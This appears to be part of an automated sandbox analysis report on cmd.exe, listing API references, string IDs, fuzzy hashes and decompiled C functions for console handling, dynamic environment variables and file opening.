                                                      0x4a738614
                                                      0x4a746a34
                                                      0x4a746a3c
                                                      0x4a746a4c
                                                      0x4a746a56
                                                      0x4a746a57
                                                      0x4a746a5f
                                                      0x4a746a61
                                                      0x4a746a79
                                                      0x4a746a7c
                                                      0x4a746a82
                                                      0x4a746a63
                                                      0x4a746a69
                                                      0x4a746a6e
                                                      0x4a746a6f
                                                      0x4a746a74
                                                      0x4a746a84
                                                      0x4a746a8a
                                                      0x4a746a91
                                                      0x4a746a97
                                                      0x4a746a9e
                                                      0x4a746aa4
                                                      0x4a746aa5
                                                      0x4a746aaa
                                                      0x4a746ab0
                                                      0x4a746a9e
                                                      0x4a746a91
                                                      0x4a73861f
                                                      0x4a738625
                                                      0x4a738631
                                                      0x4a738643
                                                      0x4a738655
                                                      0x4a73865c
                                                      0x4a738661
                                                      0x4a738664
                                                      0x4a738667
                                                      0x4a738679
                                                      0x4a746ab6
                                                      0x4a746ab6
                                                      0x4a746ab6
                                                      0x4a73867a
                                                      0x4a73867b
                                                      0x4a738687
                                                      0x4a738687
                                                      0x4a738564
                                                      0x4a73856f
                                                      0x4a73857c
                                                      0x4a738582
                                                      0x4a738587
                                                      0x4a73858c
                                                      0x4a73858e
                                                      0x4a73858e
                                                      0x4a738591
                                                      0x4a738591
                                                      0x4a738595
                                                      0x4a738596
                                                      0x4a7385a4
                                                      0x4a7385a8
                                                      0x4a7385b5
                                                      0x4a73c16f
                                                      0x4a73c177
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73c17d
                                                      0x4a73c184
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73c192
                                                      0x4a73c197
                                                      0x4a73c19c
                                                      0x4a73c1a2
                                                      0x4a73c1a4
                                                      0x4a73c1a6
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73c1ac
                                                      0x4a73c1ad
                                                      0x4a73c1ad
                                                      0x4a7385bb
                                                      0x4a7385bb
                                                      0x4a7385c7
                                                      0x4a7385cc
                                                      0x4a7385d2
                                                      0x4a7385dc
                                                      0x4a7385e6
                                                      0x4a7385ec
                                                      0x4a7385f3
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7385f7
                                                      0x4a7385ff
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7385ff

                                                      APIs
                                                      • InitializeCriticalSection.KERNEL32(4A754220), ref: 4A738511
                                                        • Part of subcall function 4A731E6C: EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
                                                        • Part of subcall function 4A731E6C: LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85
                                                      • SetConsoleCtrlHandler.KERNEL32(4A74E72A,00000001), ref: 4A738523
                                                        • Part of subcall function 4A731605: _get_osfhandle.MSVCRT ref: 4A731618
                                                        • Part of subcall function 4A731605: SetConsoleMode.KERNEL32 ref: 4A731622
                                                        • Part of subcall function 4A731605: _get_osfhandle.MSVCRT ref: 4A73162B
                                                        • Part of subcall function 4A731605: GetConsoleMode.KERNEL32 ref: 4A731635
                                                        • Part of subcall function 4A731605: _get_osfhandle.MSVCRT ref: 4A731652
                                                        • Part of subcall function 4A731605: GetConsoleMode.KERNEL32 ref: 4A731656
                                                        • Part of subcall function 4A737E13: RegOpenKeyExW.KERNEL32 ref: 4A737EA4
                                                        • Part of subcall function 4A737E13: RegQueryValueExW.KERNEL32(?,DisableUNCCheck,00000000,?,?,?), ref: 4A737EDF
                                                        • Part of subcall function 4A737E13: RegQueryValueExW.KERNEL32(?,EnableExtensions,00000000,00000001,?,?), ref: 4A737F10
                                                        • Part of subcall function 4A737E13: RegQueryValueExW.KERNEL32(?,DelayedExpansion,00000000,00000001,?,?), ref: 4A737F58
                                                        • Part of subcall function 4A737E13: RegQueryValueExW.KERNEL32(?,DefaultColor,00000000,00000001,?,?), ref: 4A737F89
                                                      • GetCommandLineW.KERNEL32(?,00000003), ref: 4A738542
                                                      • GetCommandLineW.KERNEL32(00000000,?), ref: 4A738565
                                                      • GetConsoleOutputCP.KERNEL32 ref: 4A7385BB
                                                      • GetCPInfo.KERNEL32(00000000,4A754260), ref: 4A7385CC
                                                      • GetProcessHeap.KERNEL32(00000000,0000020C), ref: 4A7385DF
                                                      • HeapAlloc.KERNEL32(00000000), ref: 4A7385E6
                                                      • GetConsoleTitleW.KERNEL32 ref: 4A7385F7
                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 4A73861F
                                                      • GetProcAddress.KERNEL32(00000000,CopyFileExW), ref: 4A738636
                                                      • GetProcAddress.KERNEL32(IsDebuggerPresent), ref: 4A738648
                                                      • GetProcAddress.KERNEL32(SetConsoleInputExeNameW), ref: 4A73865A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Console$QueryValue$AddressCriticalModeProcSection_get_osfhandle$CommandHeapLine$AllocCtrlEnterHandleHandlerInfoInitializeLeaveModuleOpenOutputProcessTitle
                                                      • String ID: %WINDOWS_COPYRIGHT%$CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                      • API String ID: 4158127395-2796496087
                                                      • Opcode ID: 55f7674d9f96ad6546ee6b3655e0c0db19196e5587383385d5237f4113af7f0c
                                                      • Instruction ID: 0268af57c9192c0c42b277a3ac9fd088e8eb99ad42f68a8d5bb0411dd7fc5da7
                                                      • Opcode Fuzzy Hash: 55f7674d9f96ad6546ee6b3655e0c0db19196e5587383385d5237f4113af7f0c
                                                      • Instruction Fuzzy Hash: 437147B1A4DA11EAEB709BA1CC4DA9A3FBCEB46351F134015E501DB943DB784D48CB25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _wcsicmp$EnvironmentVariable
                                                      • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                      • API String ID: 198002717-2301591722
                                                      • Opcode ID: 426c71c455b61c7da8905a566a5a7becf0630357fa666f0aaa1631d0091c36c6
                                                      • Instruction ID: 8fe4115b44368f9b3a9117c9e6d99efbebf839dea6760e5e2766a44889741f54
                                                      • Opcode Fuzzy Hash: 426c71c455b61c7da8905a566a5a7becf0630357fa666f0aaa1631d0091c36c6
                                                      • Instruction Fuzzy Hash: 6B31D67211DA127AEF341B65DC09E9A3FADEF562B1B124026F605DD491EF21C908D3A8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 49%
                                                      			E4A74FE1B(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				long _v40;
                                                      				char _v41;
                                                      				char _v42;
                                                      				char _v43;
                                                      				long _v48;
                                                      				signed int _v52;
                                                      				long _v56;
                                                      				void* _v60;
                                                      				void* _v64;
                                                      				intOrPtr _v68;
                                                      				long _v72;
                                                      				char _v76;
                                                      				intOrPtr _v80;
                                                      				void* __esi;
                                                      				signed int _t57;
                                                      				void* _t60;
                                                      				intOrPtr* _t63;
                                                      				void* _t69;
                                                      				void* _t71;
                                                      				void* _t73;
                                                      				wchar_t* _t76;
                                                      				signed int _t79;
                                                      				intOrPtr* _t82;
                                                      				signed short _t94;
                                                      				intOrPtr* _t100;
                                                      				void* _t112;
                                                      				void* _t115;
                                                      				intOrPtr _t119;
                                                      				void* _t123;
                                                      				void _t129;
                                                      				void* _t131;
                                                      				void* _t132;
                                                      				void* _t133;
                                                      				void* _t135;
                                                      				signed int _t138;
                                                      				signed int _t139;
                                                      				void* _t140;
                                                      
                                                      				_t133 = __edi;
                                                      				_t131 = __edx;
                                                      				_t117 = __ecx;
                                                      				_t115 = __ebx;
                                                      				_t57 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t57 ^ _t139;
                                                      				_t59 = _a4;
                                                      				_v52 = _v52 & 0x00000000;
                                                      				_v68 = _a4;
                                                      				_v43 = 0;
                                                      				_v41 = 0;
                                                      				if(_a8 != 0x400023d3) {
                                                      					L5:
                                                      					_push(_a12);
                                                      					_t60 = E4A73C56B(_t117);
                                                      					_t135 = _t60;
                                                      					if(_t135 == 0) {
                                                      						L10:
                                                      						E4A73185A( &_v40, 0x10, L"NY");
                                                      						goto L11;
                                                      					} else {
                                                      						_t10 = _t60 + 2; // 0x2
                                                      						_t132 = _t10;
                                                      						do {
                                                      							_t129 =  *_t60;
                                                      							_t60 = _t60 + 2;
                                                      						} while (_t129 != 0);
                                                      						if(_t60 - _t132 >> 1 >= 0x10) {
                                                      							goto L10;
                                                      						}
                                                      						E4A73185A( &_v40, 0x10, _t135);
                                                      						__imp___wcsupr( &_v40);
                                                      						L11:
                                                      						_t63 =  &_v40;
                                                      						_t15 = _t63 + 2; // 0x2
                                                      						_t131 = _t15;
                                                      						do {
                                                      							_t119 =  *_t63;
                                                      							_t63 = _t63 + 2;
                                                      						} while (_t119 != 0);
                                                      						_push(_t115);
                                                      						_push(_t133);
                                                      						_v80 = (_t63 - _t131 >> 1) - 1;
                                                      						LocalFree(_t135);
                                                      						_t69 = GetStdHandle(0xfffffff5);
                                                      						_v64 = _t69;
                                                      						if(GetConsoleMode(_t69,  &_v56) != 0) {
                                                      							_v43 = 1;
                                                      							SetConsoleMode(_v64, _v56 | 0x00000001);
                                                      						}
                                                      						_t71 = GetStdHandle(0xfffffff6);
                                                      						_t121 =  &_v72;
                                                      						_v60 = _t71;
                                                      						if(GetConsoleMode(_t71,  &_v72) != 0) {
                                                      							_v41 = 1;
                                                      							SetConsoleMode(_v60, _v72 | 0x00000007);
                                                      							_t100 =  *0x4a7541f4; // 0x0
                                                      							if(_t100 != 0) {
                                                      								 *_t100(L"<noalias>");
                                                      							}
                                                      						}
                                                      						goto L18;
                                                      						do {
                                                      							do {
                                                      								L18:
                                                      								_v48 = 0;
                                                      								_v42 = 1;
                                                      								if(_v68 == 0) {
                                                      									_push(0);
                                                      									_push(_a8);
                                                      									_t73 = E4A7399E1(_t121);
                                                      									_pop(_t123);
                                                      								} else {
                                                      									_t73 = E4A7399E1(_t121, _a8, 1, _v68);
                                                      									_t140 = _t140 + 0xc;
                                                      								}
                                                      								if(E4A733B03(_t73, _t123, 0) != 0) {
                                                      									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
                                                      								}
                                                      								while(_v48 != 0xa) {
                                                      									_push( &_v76);
                                                      									_push(1);
                                                      									if(E4A7367D3(GetStdHandle(0xfffffff6),  &_v48) != 0 && _v76 == 1) {
                                                      										if(_v42 != 0) {
                                                      											_t94 = towupper(_v48);
                                                      											_t88 = _t94 & 0x0000ffff;
                                                      											_pop(_t123);
                                                      											_v52 = _t94 & 0x0000ffff;
                                                      											_v42 = 0;
                                                      										}
                                                      										if(E4A733B03(_t88, _t123, 0) == 0 || ( *0x4a754154 & 0x00000001) == 0) {
                                                      											E4A7358F3(0x4a7545b8, _v48 & 0x0000ffff);
                                                      											_pop(_t123);
                                                      										}
                                                      										continue;
                                                      									}
                                                      									_push(0x4a7545a8);
                                                      									_v52 = _v40 & 0x0000ffff;
                                                      									E4A7358F3();
                                                      									goto L33;
                                                      								}
                                                      								L33:
                                                      								_t76 = wcschr( &_v40, _v52);
                                                      								_pop(_t121);
                                                      							} while (_t76 == 0);
                                                      							_t121 =  &_v40;
                                                      							_t138 = _t76 -  &_v40 >> 1;
                                                      						} while (_t138 > _v80);
                                                      						if(_v43 != 0) {
                                                      							SetConsoleMode(_v64, _v56);
                                                      						}
                                                      						if(_v41 != 0) {
                                                      							SetConsoleMode(_v60, _v72);
                                                      							_t82 =  *0x4a7541f4; // 0x0
                                                      							if(_t82 != 0) {
                                                      								 *_t82(L"CMD.EXE");
                                                      							}
                                                      						}
                                                      						_pop(_t133);
                                                      						_t79 = _t138;
                                                      						_pop(_t115);
                                                      						L41:
                                                      						return E4A7313A9(_t79, _t115, _v8 ^ _t139, _t131, _t133, _t138);
                                                      					}
                                                      				}
                                                      				_t138 = E4A741F66(_t59, 0);
                                                      				if(_t138 == 0xffffffff) {
                                                      					goto L5;
                                                      				}
                                                      				_t112 = E4A733B03(_t111, __ecx, _t138);
                                                      				_push(_t138);
                                                      				if(_t112 == 0) {
                                                      					E4A733AB3();
                                                      					goto L5;
                                                      				} else {
                                                      					E4A733AB3();
                                                      					_pop(_t79);
                                                      					goto L41;
                                                      				}
                                                      			}


                                                      APIs
                                                      • _wcsupr.MSVCRT ref: 4A74FEAA
                                                      • LocalFree.KERNEL32(00000000,4A76C642,00000000,00000000,00000010,4A750080,0000233F,4A731C18,00000000,4A754210,?,00000004,74EC5129,00000000), ref: 4A74FEDE
                                                      • GetStdHandle.KERNEL32(000000F5), ref: 4A74FEEC
                                                      • GetConsoleMode.KERNEL32 ref: 4A74FEFC
                                                      • SetConsoleMode.KERNEL32 ref: 4A74FF16
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 4A74FF1A
                                                      • GetConsoleMode.KERNEL32 ref: 4A74FF24
                                                      • SetConsoleMode.KERNEL32 ref: 4A74FF38
                                                      • GetStdHandle.KERNEL32(000000F6,00000000), ref: 4A74FF81
                                                      • FlushConsoleInputBuffer.KERNEL32(00000000), ref: 4A74FF84
                                                      • GetStdHandle.KERNEL32(000000F6,0000000A,00000001,?,00000000), ref: 4A74FF98
                                                      • towupper.MSVCRT ref: 4A74FFB3
                                                      • wcschr.MSVCRT ref: 4A75000A
                                                      • SetConsoleMode.KERNEL32 ref: 4A750038
                                                      • SetConsoleMode.KERNEL32 ref: 4A750046
                                                        • Part of subcall function 4A733B03: _get_osfhandle.MSVCRT ref: 4A733B0D
                                                        • Part of subcall function 4A733B03: GetFileType.KERNEL32(00000000), ref: 4A733B17
                                                        • Part of subcall function 4A733AB3: _close.MSVCRT ref: 4A733AED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                      • String ID: <noalias>$CMD.EXE
                                                      • API String ID: 2015057810-1690691951
                                                      • Opcode ID: f0a5ef1b1f18b52643f0589b841b3624817854d57d72bb36bb0787d0b6a999a3
                                                      • Instruction ID: 732b2c575457a72b4e191dd8ae00c8ccd50f425ebcc67c2c148448f7ca903813
                                                      • Opcode Fuzzy Hash: f0a5ef1b1f18b52643f0589b841b3624817854d57d72bb36bb0787d0b6a999a3
                                                      • Instruction Fuzzy Hash: 6D71A172D09219AEDF20DBA8DC48ADEBFB8AF09721F124115F801F60C1DB70A949C764
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E4A7397CA(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12, void* _a16) {
                                                      				long _v8;
                                                      				long _v12;
                                                      				long _v16;
                                                      				char _v20;
                                                      				short _v28;
                                                      				short _v32;
                                                      				struct _CONSOLE_SCREEN_BUFFER_INFO _v44;
                                                      				struct _CONSOLE_SCREEN_BUFFER_INFO _v68;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* _t57;
                                                      				long _t60;
                                                      				signed int _t64;
                                                      				long _t68;
                                                      				long _t69;
                                                      				signed int _t73;
                                                      				intOrPtr* _t74;
                                                      				int _t78;
                                                      				int _t82;
                                                      				int _t84;
                                                      				signed short _t89;
                                                      				int _t98;
                                                      				char* _t103;
                                                      				signed char _t104;
                                                      				void* _t106;
                                                      				signed int _t112;
                                                      				intOrPtr _t113;
                                                      				void* _t114;
                                                      				long _t117;
                                                      
                                                      				_t106 = __edx;
                                                      				_push(_t114);
                                                      				if(E4A734490(_t57, _a8) != 0) {
                                                      					__imp___get_osfhandle(_a8);
                                                      					__ebx = __eax;
                                                      					__eax =  &_v44;
                                                      					__eax = GetConsoleScreenBufferInfo(__ebx,  &_v44);
                                                      					__eflags = __eax;
                                                      					if(__eax == 0) {
                                                      						goto L20;
                                                      					} else {
                                                      						__ecx = _v32;
                                                      						_v28 = _v28 - _v32;
                                                      						__eax = _v28 - _v32 - 1;
                                                      						__eflags = __eax;
                                                      						_v12 = __eax;
                                                      					}
                                                      				}
                                                      				_v8 = _v8 & 0x00000000;
                                                      				_t12 =  &_a12; // 0x4a745268
                                                      				_t117 = E4A7398A5(_t106, _a4, E4A7325B8,  *_t12, _a16);
                                                      				_a12 = _t117;
                                                      				_a16 = 0x4a764640;
                                                      				__eflags = _t117;
                                                      				if(_t117 == 0) {
                                                      					L14:
                                                      					__eflags = _v8;
                                                      					if(_v8 != 0) {
                                                      						__eflags = _a8 - 2;
                                                      						if(__eflags != 0) {
                                                      							goto L15;
                                                      						} else {
                                                      							_push(1);
                                                      							E4A7372E9(_t103, _t114, _t117, __eflags);
                                                      							asm("int3");
                                                      							_t56 = _t103 - 0x20; // 0x4a7541f0
                                                      							_t64 = (_t56 >> 5) + 1;
                                                      							_t104 = _t103 + _t64 * 0xffffffe0;
                                                      							return  *(0x4a75487c + _t64 * 4) & 1 << _t104;
                                                      						}
                                                      					}
                                                      					L15:
                                                      					_t60 = _v8;
                                                      				} else {
                                                      					_t114 = SetConsoleMode;
                                                      					do {
                                                      						__eflags = 0;
                                                      						if(0 == 0) {
                                                      							_t103 =  &_v20;
                                                      							_t68 = E4A73453E(_t117 + _t117, _a8, _a16, _t117 + _t117, _t103);
                                                      							__eflags = _t68;
                                                      							if(_t68 == 0) {
                                                      								L21:
                                                      								_t69 = GetLastError();
                                                      								_v8 = _t69;
                                                      								goto L14;
                                                      							} else {
                                                      								__eflags = _v20 - _t117 + _t117;
                                                      								if(_v20 == _t117 + _t117) {
                                                      									goto L12;
                                                      								} else {
                                                      									goto L21;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							__eflags =  *0x4a7706a4;
                                                      							if( *0x4a7706a4 != 0) {
                                                      								_t73 =  *0x4a770924; // 0x0
                                                      								__eflags = _t73 - _v12;
                                                      								if(_t73 < _v12) {
                                                      									L26:
                                                      									_t74 = _a16;
                                                      									_t103 = _t74 + _a12 * 2;
                                                      									while(1) {
                                                      										__eflags = _t74 - _t103;
                                                      										if(_t74 >= _t103) {
                                                      											break;
                                                      										}
                                                      										_t112 =  *0x4a770924; // 0x0
                                                      										__eflags = _t112 - _v12;
                                                      										if(_t112 < _v12) {
                                                      											_t113 =  *_t74;
                                                      											_t74 = _t74 + 2;
                                                      											__eflags = _t113 - 0xa;
                                                      											if(_t113 == 0xa) {
                                                      												 *0x4a770924 =  *0x4a770924 + 1;
                                                      												__eflags =  *0x4a770924;
                                                      											}
                                                      											continue;
                                                      										}
                                                      										break;
                                                      									}
                                                      									_t117 = _t74 - _a16 >> 1;
                                                      									goto L11;
                                                      								} else {
                                                      									 *0x4a770924 =  *0x4a770924 & 0x00000000;
                                                      									_t82 = GetConsoleScreenBufferInfo(0,  &_v44);
                                                      									__eflags = _t82;
                                                      									if(_t82 == 0) {
                                                      										goto L26;
                                                      									} else {
                                                      										_t84 = WriteConsoleW(0,  *0x4a770920,  *0x4a77091c,  &_v8, 0);
                                                      										__eflags = _t84;
                                                      										if(_t84 == 0) {
                                                      											goto L26;
                                                      										} else {
                                                      											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
                                                      											GetConsoleMode(0,  &_v16);
                                                      											_t89 = SetConsoleMode(0, 0);
                                                      											__imp___getch();
                                                      											SetConsoleMode(0, _v16);
                                                      											GetConsoleScreenBufferInfo(0,  &_v68);
                                                      											_push( &_v8);
                                                      											_push(_v44.dwCursorPosition);
                                                      											_push(E4A74FD20( &_v44,  &_v68));
                                                      											_push(0x20);
                                                      											_push(0);
                                                      											FillConsoleOutputCharacterW();
                                                      											_t98 = SetConsoleCursorPosition(0, _v44.dwCursorPosition);
                                                      											__eflags = (_t89 & 0x0000ffff) - 3;
                                                      											if((_t89 & 0x0000ffff) == 3) {
                                                      												E4A74E702(_t98);
                                                      												_t60 = 0;
                                                      											} else {
                                                      												goto L26;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							} else {
                                                      								_t117 = 0xa0;
                                                      								__eflags = _a12 - 0xa0;
                                                      								if(_a12 <= 0xa0) {
                                                      									_t117 = _a12;
                                                      								}
                                                      								L11:
                                                      								_t78 = WriteConsoleW(0, _a16, _t117,  &_v8, 0);
                                                      								__eflags = _t78;
                                                      								if(_t78 == 0) {
                                                      									_v8 = GetLastError();
                                                      								} else {
                                                      									L12:
                                                      									_t20 =  &_v8;
                                                      									 *_t20 = _v8 & 0x00000000;
                                                      									__eflags =  *_t20;
                                                      								}
                                                      								goto L13;
                                                      							}
                                                      						}
                                                      						goto L16;
                                                      						L13:
                                                      						_t22 =  &_a12;
                                                      						 *_t22 = _a12 - _t117;
                                                      						__eflags =  *_t22;
                                                      						_a16 = _a16 + _t117 * 2;
                                                      					} while ( *_t22 != 0);
                                                      					goto L14;
                                                      				}
                                                      				L16:
                                                      				return _t60;
                                                      				goto L38;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 4A734490: _get_osfhandle.MSVCRT ref: 4A73449A
                                                        • Part of subcall function 4A734490: GetFileType.KERNEL32(00000000), ref: 4A7344A9
                                                      • _get_osfhandle.MSVCRT ref: 4A7397E8
                                                      • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A7397F6
                                                      • GetLastError.KERNEL32(?,4A764640,00000000,?,?,4A7325B8,hRtJ:#,?,?,?,?,?,4A736D61,00000000,00000002,0000233A), ref: 4A7399D1
                                                        • Part of subcall function 4A7398A5: FormatMessageW.KERNEL32(00001A00,00000000,0000013D,00000000,4A764640,00002000,00000000,00000000,74EC14B9,00000000), ref: 4A7398EC
                                                        • Part of subcall function 4A7398A5: FormatMessageW.KERNEL32(00001800,00000000,0000013D,00000000,4A764640,00002000,?,4A764640,00000025), ref: 4A739943
                                                      • WriteConsoleW.KERNEL32 ref: 4A73986C
                                                      • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A749937
                                                      • WriteConsoleW.KERNEL32 ref: 4A749958
                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,?,4A736D61,00000000,00000002,0000233A,?,?,?,4A745268,0000233A,00000000), ref: 4A749964
                                                      • FlushConsoleInputBuffer.KERNEL32(00000000), ref: 4A74996B
                                                      • GetConsoleMode.KERNEL32 ref: 4A749976
                                                      • SetConsoleMode.KERNEL32 ref: 4A74997F
                                                      • _getch.MSVCRT ref: 4A749981
                                                      • SetConsoleMode.KERNEL32 ref: 4A74998E
                                                      • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A749995
                                                      • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000000,?,?), ref: 4A7499B3
                                                      • SetConsoleCursorPosition.KERNEL32 ref: 4A7499BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Console$Buffer$InfoModeScreen$FormatMessageWrite_get_osfhandle$CharacterCursorErrorFileFillFlushHandleInputLastOutputPositionType_getch
                                                      • String ID: hRtJ:#
                                                      • API String ID: 3481465048-153624809
                                                      • Opcode ID: 672c57fd1c5b932a8924f7be3cf3fdcd63cbfea995793838277f0e5338020dbb
                                                      • Instruction ID: e8075e136d48caef86a29306f91ba62e4d9826b4b98522eebb1f4cf29b086bba
                                                      • Opcode Fuzzy Hash: 672c57fd1c5b932a8924f7be3cf3fdcd63cbfea995793838277f0e5338020dbb
                                                      • Instruction Fuzzy Hash: 1E6151B2A05209EFDF60DFA0CD89AEE7BBCEB45352F124515E902D6442D770DE58CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 63%
                                                      			E4A733A0A(WCHAR* _a4, signed int _a8, long _a12) {
                                                      				long _v8;
                                                      				signed int _v12;
                                                      				void _v16;
                                                      				long _v20;
                                                      				struct _SECURITY_ATTRIBUTES _v32;
                                                      				int _t49;
                                                      				long _t51;
                                                      				void* _t55;
                                                      				void* _t73;
                                                      				void* _t77;
                                                      				long _t79;
                                                      
                                                      				_t79 = 0;
                                                      				_t49 = _a8 & 0x00000003;
                                                      				_v32.bInheritHandle = 1;
                                                      				_v32.lpSecurityDescriptor = 0;
                                                      				_v32.nLength = 0xc;
                                                      				if(_t49 > 2) {
                                                      					L13:
                                                      					return _t49 | 0xffffffff;
                                                      				}
                                                      				if((_a8 & 1) != 0) {
                                                      					if((_a8 & 0x00000008) == 0) {
                                                      						goto L2;
                                                      					}
                                                      					goto L13;
                                                      				}
                                                      				L2:
                                                      				if(_t49 != _t79) {
                                                      					_v12 = 0x40000000;
                                                      					__imp___wcsicmp(_a4, "con");
                                                      					if(_t49 != 0) {
                                                      						_a12 = 1;
                                                      					}
                                                      					_push(2);
                                                      				} else {
                                                      					_v12 = 0x80000000;
                                                      					_push(3);
                                                      				}
                                                      				_pop(_t51);
                                                      				_push(_t79);
                                                      				if(_a8 == 0x10a) {
                                                      					_t55 = CreateFileW(_a4, _v12 | 0x80000000, _a12,  &_v32, 3, 0x80, ??);
                                                      					_t73 = _t55;
                                                      					if(_t73 == 0xffffffff) {
                                                      						_t55 = CreateFileW(_a4, _v12, _a12,  &_v32, 4, 0x80, 0);
                                                      						_t73 = _t55;
                                                      						if(_t73 != 0xffffffff) {
                                                      							goto L15;
                                                      						}
                                                      						goto L23;
                                                      					}
                                                      					L15:
                                                      					_t79 = 0;
                                                      					goto L6;
                                                      				} else {
                                                      					_t55 = CreateFileW(_a4, _v12, _a12,  &_v32, _t51, 0x80, ??);
                                                      					_t73 = _t55;
                                                      					if(_t73 == 0xffffffff) {
                                                      						L23:
                                                      						_t49 = GetLastError();
                                                      						 *0x4a754128 = _t49;
                                                      						if(_t49 != 0x6e) {
                                                      							goto L13;
                                                      						}
                                                      						 *0x4a754128 = 2;
                                                      						goto L13;
                                                      					}
                                                      					L6:
                                                      					__imp___open_osfhandle(8);
                                                      					_t77 = _t73;
                                                      					_a12 = _t55;
                                                      					if((_a8 & 0x00000008) != 0) {
                                                      						if(E4A733B03(_t55, _t77, _t55) == 0 && GetFileSize(_t73, _t79) != 0) {
                                                      							_v8 = _v8 | 0xffffffff;
                                                      							_v16 = _t79;
                                                      							if(SetFilePointer(_t73, 0xffffffff,  &_v8, 2) == 0xffffffff) {
                                                      								_t49 = GetLastError();
                                                      								 *0x4a754128 = _t49;
                                                      								if(_t49 == _t79) {
                                                      									goto L19;
                                                      								}
                                                      								if(_a12 == 0xffffffff) {
                                                      									_t49 = CloseHandle(_t73);
                                                      								} else {
                                                      									__imp___close(_a12);
                                                      								}
                                                      								goto L13;
                                                      							}
                                                      							L19:
                                                      							if(ReadFile(_t73,  &_v16, 1,  &_v20, _t79) == 0) {
                                                      								_v8 = _t79;
                                                      								SetFilePointer(_t73, _t79,  &_v8, 2);
                                                      							}
                                                      							if(_v16 == 0x1a) {
                                                      								_v8 = _v8 | 0xffffffff;
                                                      								SetFilePointer(_t73, 0xffffffff,  &_v8, 2);
                                                      							}
                                                      						}
                                                      					}
                                                      					E4A733B3E(_a12);
                                                      					return _a12;
                                                      				}
                                                      			}















                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000080,00000000), ref: 4A733A73
                                                      • _open_osfhandle.MSVCRT ref: 4A733A87
                                                      • _wcsicmp.MSVCRT ref: 4A734A9F
                                                      • CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000080,00000000), ref: 4A73D668
                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,00008000), ref: 4A73D68C
                                                      • SetFilePointer.KERNEL32(00000000,000000FF,000000FF,00000002), ref: 4A73D6B0
                                                      • ReadFile.KERNEL32(00000000,00000008,00000001,?,00000000), ref: 4A73D6C7
                                                      • GetLastError.KERNEL32 ref: 4A73D8FC
                                                      • SetFilePointer.KERNEL32(00000000,000000FF,000000FF,00000002), ref: 4A749B30
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: File$CreatePointer$ErrorLastReadSize_open_osfhandle_wcsicmp
                                                      • String ID: con
                                                      • API String ID: 2187688666-4257191772
                                                      • Opcode ID: 68f7a3c0a6b505178967bd43ed0b9bc592dba943eeb210a707506d1da211d27b
                                                      • Instruction ID: 0709471d4227617c090d8388a7f83b8deb8a223cc4550aa0a7f32d278546ba9f
                                                      • Opcode Fuzzy Hash: 68f7a3c0a6b505178967bd43ed0b9bc592dba943eeb210a707506d1da211d27b
                                                      • Instruction Fuzzy Hash: B051CDB2948649BADB308FA1CC49A9F3FBCEB05371F128615F925E61C2D7708A48CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
